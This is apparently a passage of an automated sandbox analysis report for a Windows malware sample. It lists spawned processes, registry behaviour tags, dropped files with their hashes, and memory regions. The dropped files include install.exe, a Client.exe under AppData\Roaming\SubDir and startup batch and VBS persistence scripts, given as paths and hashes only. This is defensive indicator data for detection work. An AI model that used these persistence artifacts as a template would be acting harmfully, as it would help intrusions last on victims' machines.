C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,820439545671324440,6590442592881513613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3464 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,820439545671324440,6590442592881513613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,820439545671324440,6590442592881513613,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,820439545671324440,6590442592881513613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:13⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD59751fcb3d8dc82d33d50eebe53abe314
SHA17a680212700a5d9f3ca67c81e0e243834387c20c
SHA256ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7
SHA51254907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD54158365912175436289496136e7912c2
SHA1813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59
SHA256354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1
SHA51274b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5ce4c898f8fc7601e2fbc252fdadb5115
SHA101bf06badc5da353e539c7c07527d30dccc55a91
SHA256bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa
SHA51280fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5965852502bce8888d8244d0701ac1f5b
SHA1dca33c1229a0cc502c188d9d382f50c50b59edc8
SHA25647592bce8934cded97f5eb655092a9b5350f2ea0314e61028d4720e846b09a8c
SHA5121888ad77629c86b816d64615dad46a0082f4949d59bfdfb773ea986b317f98d3a04219089d42f26a85cc9c25add572a701ee0499ad08f85e205fddf805960b97
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5dd31b94e2206adf86569b27f9f81d2ab
SHA1719d43dd704be14eb462f1c3b77685a26b06bff8
SHA256340d9ff6e02ffe956b65d38be021d48f9cff3b4a5fb2d32b6198de62adb1ee00
SHA5120dfcac0caf27f896f013938a1da5a430b499bdc7d7754e2d27e6833bc4543bbff11f2c955b53ce926e02f8985c97377e068cfb3366ec5603093d0b2c96df4afe
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD550adb913f479ceba5afd62f77131f23f
SHA11af16536343e279cb8639ccd4ff7856fa88f739a
SHA2561f5651cec04cde713c2b7cb2e27989757ff228b0d85998352eca181feb8f96af
SHA51218e91eec6114084936f3b5c2cb0ecbc054a291eaa9d92f269960c23ac625e8703b80740a94e7b1201b0358657d0020bb9d97c00d19f27f4b7339a5b819a7cc6c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD538f7fa4b8f2ee28b31a5057eade30771
SHA1b04fc514f3baeb1a9a05ad9ee0135762820c52c5
SHA256de4d57fd4a1acb5e5523759c156f5a82c3f76f9868c1f3cac2156305a22323ec
SHA5123f5095d049b3ffcf18f2889d2218d40844c244495737e1ddd3029e0018f20fb1538f5e6dd4d18afde1ebf35cd14675dcfcf1cd86dcd6a00d22a1da3da76981f0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD58fe03617262d7692804bdc935ef61a22
SHA13a73ff735e10324e1582fc23c4d473dce6d159e4
SHA256df780c144ec9f463b72670aa2963c7680da1337bc9132eb83a010942c5c0b695
SHA512b0f95f1c9d8e3ef56b7768a199b255c695b27c068471091487aece2fb116faabbe83ab9163cdcec3d1d7b26e3301f5e250ebcb86253c6aa024a02aadcd1bc90b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
17KB
MD5a65ace0ab7b62b525f3c7bf02c8b7850
SHA13bd6b9bbeed9cfc07ddb373636a1c7f18f76ab4d
SHA256cf99ed79fec2d6aecde2d75d9cea3b8a483e400a8383e2fe0cda272cd34a0e7f
SHA5129bae1e26c85b57ca37415f0cdaa412a0daabcd793d1a073954aa3bbab3ec0b1dcac1280380fb3358eb6466326195e38eea407f4aa492e5b32ced2243012d2830
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_033rezkr.boq.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exeFilesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
C:\Users\Admin\AppData\Roaming\startup_str_642.batFilesize
512KB
MD5d188d8d8e859b13330551005efc1f6cb
SHA16e3e2c19174c7cd0e9a2c248c700cd25a7ee17da
SHA2567de9346c81bcb5b91230450e2092f27851f5cffb1837058e611ac103974f680a
SHA5121847acf391c3d7a21962ae19908af637f239edaab741d2c7dc9e876b04dea6f54b7d9d42ebf3634fff9283692b7ecb566e067368a77e618bb8b5ef402e33e59f
-
C:\Users\Admin\AppData\Roaming\startup_str_642.vbsFilesize
115B
MD5651e268bafb4b7df105ed5f36517dfd2
SHA1554788104a08a9aa3a7ef0a7ec510ec6bdc56ac0
SHA256c182994577c5c2bcc3e0707cfd9be191b8651ad1c624b288f0f26ca2e9c626d2
SHA512f347e8e824ff689acac44313f045cd4282f5adfce2765c8cbd6d9e335ab1e0a5464d50bcb2fb37ef491e6e78ec482aebc6c372f15b69b104148451518c7dd43c
-
\??\pipe\LOCAL\crashpad_4340_EJZUJBDSNIBVCZNKMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/64-165-0x0000018DAEB50000-0x0000018DAEB7B000-memory.dmpFilesize
172KB
-
memory/64-172-0x00007FF986090000-0x00007FF9860A0000-memory.dmpFilesize
64KB
-
memory/64-171-0x0000018DAEB50000-0x0000018DAEB7B000-memory.dmpFilesize
172KB
-
memory/428-176-0x000001BD07D00000-0x000001BD07D2B000-memory.dmpFilesize
172KB
-
memory/616-138-0x0000025C476A0000-0x0000025C476CB000-memory.dmpFilesize
172KB
-
memory/616-130-0x0000025C47670000-0x0000025C47695000-memory.dmpFilesize
148KB
-
memory/616-132-0x0000025C476A0000-0x0000025C476CB000-memory.dmpFilesize
172KB
-
memory/616-139-0x00007FF986090000-0x00007FF9860A0000-memory.dmpFilesize
64KB
-
memory/616-131-0x0000025C476A0000-0x0000025C476CB000-memory.dmpFilesize
172KB
-
memory/680-149-0x000001BD045B0000-0x000001BD045DB000-memory.dmpFilesize
172KB
-
memory/680-143-0x000001BD045B0000-0x000001BD045DB000-memory.dmpFilesize
172KB
-
memory/680-150-0x00007FF986090000-0x00007FF9860A0000-memory.dmpFilesize
64KB
-
memory/960-160-0x00000153D15A0000-0x00000153D15CB000-memory.dmpFilesize
172KB
-
memory/960-154-0x00000153D15A0000-0x00000153D15CB000-memory.dmpFilesize
172KB
-
memory/960-161-0x00007FF986090000-0x00007FF9860A0000-memory.dmpFilesize
64KB
-
memory/1312-102-0x0000000007090000-0x0000000007106000-memory.dmpFilesize
472KB
-
memory/1312-100-0x0000000006D40000-0x0000000006D84000-memory.dmpFilesize
272KB
-
memory/1900-17-0x0000000005B00000-0x0000000005E54000-memory.dmpFilesize
3.3MB
-
memory/1900-4-0x00000000749A0000-0x0000000075150000-memory.dmpFilesize
7.7MB
-
memory/1900-22-0x0000000002A60000-0x0000000002A68000-memory.dmpFilesize
32KB
-
memory/1900-23-0x0000000007250000-0x00000000072B2000-memory.dmpFilesize
392KB
-
memory/1900-21-0x00000000071C0000-0x00000000071DA000-memory.dmpFilesize
104KB
-
memory/1900-20-0x0000000007800000-0x0000000007E7A000-memory.dmpFilesize
6.5MB
-
memory/1900-19-0x0000000006080000-0x00000000060CC000-memory.dmpFilesize
304KB
-
memory/1900-24-0x0000000009430000-0x00000000099D4000-memory.dmpFilesize
5.6MB
-
memory/1900-18-0x0000000006030000-0x000000000604E000-memory.dmpFilesize
120KB
-
memory/1900-7-0x0000000005A90000-0x0000000005AF6000-memory.dmpFilesize
408KB
-
memory/1900-1-0x0000000002B50000-0x0000000002B86000-memory.dmpFilesize
216KB
-
memory/1900-3-0x00000000053F0000-0x0000000005A18000-memory.dmpFilesize
6.2MB
-
memory/1900-0-0x00000000749AE000-0x00000000749AF000-memory.dmpFilesize
4KB
-
memory/1900-2-0x00000000749A0000-0x0000000075150000-memory.dmpFilesize
7.7MB
-
memory/1900-6-0x0000000005A20000-0x0000000005A86000-memory.dmpFilesize
408KB
-
memory/1900-5-0x00000000052F0000-0x0000000005312000-memory.dmpFilesize
136KB
-
memory/1900-78-0x00000000749A0000-0x0000000075150000-memory.dmpFilesize
7.7MB
-
memory/3440-114-0x00007FF9C6010000-0x00007FF9C6205000-memory.dmpFilesize
2.0MB
-
memory/3440-115-0x00007FF9C4800000-0x00007FF9C48BE000-memory.dmpFilesize
760KB
-
memory/3440-113-0x0000029431810000-0x000002943183A000-memory.dmpFilesize
168KB
-
memory/3440-103-0x0000029431320000-0x0000029431342000-memory.dmpFilesize
136KB
-
memory/3440-126-0x00000294316A0000-0x00000294317EE000-memory.dmpFilesize
1.3MB
-
memory/3544-80-0x0000000007330000-0x00000000073C2000-memory.dmpFilesize
584KB
-
memory/3544-82-0x00000000076D0000-0x000000000770C000-memory.dmpFilesize
240KB
-
memory/3544-79-0x00000000071E0000-0x000000000724C000-memory.dmpFilesize
432KB
-
memory/3544-81-0x0000000007430000-0x0000000007442000-memory.dmpFilesize
72KB
-
memory/4684-56-0x00000000749A0000-0x0000000075150000-memory.dmpFilesize
7.7MB
-
memory/4684-55-0x0000000007A50000-0x0000000007A61000-memory.dmpFilesize
68KB
-
memory/4684-51-0x0000000007700000-0x00000000077A3000-memory.dmpFilesize
652KB
-
memory/4684-50-0x00000000749A0000-0x0000000075150000-memory.dmpFilesize
7.7MB
-
memory/4684-52-0x00000000749A0000-0x0000000075150000-memory.dmpFilesize
7.7MB
-
memory/4684-26-0x00000000749A0000-0x0000000075150000-memory.dmpFilesize
7.7MB
-
memory/4684-53-0x00000000078C0000-0x00000000078CA000-memory.dmpFilesize
40KB
-
memory/4684-54-0x0000000007AE0000-0x0000000007B76000-memory.dmpFilesize
600KB
-
memory/4684-49-0x0000000006AF0000-0x0000000006B0E000-memory.dmpFilesize
120KB
-
memory/4684-59-0x00000000749A0000-0x0000000075150000-memory.dmpFilesize
7.7MB
-
memory/4684-32-0x00000000749A0000-0x0000000075150000-memory.dmpFilesize
7.7MB
-
memory/4684-37-0x00000000749A0000-0x0000000075150000-memory.dmpFilesize
7.7MB
-
memory/4684-39-0x00000000707C0000-0x000000007080C000-memory.dmpFilesize
304KB
-
memory/4684-38-0x00000000076C0000-0x00000000076F2000-memory.dmpFilesize
200KB
-
memory/4864-121-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4864-127-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4864-116-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4864-122-0x00007FF9C6010000-0x00007FF9C6205000-memory.dmpFilesize
2.0MB
-
memory/4864-123-0x00007FF9C4800000-0x00007FF9C48BE000-memory.dmpFilesize
760KB
-
memory/4864-119-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4864-118-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4864-117-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB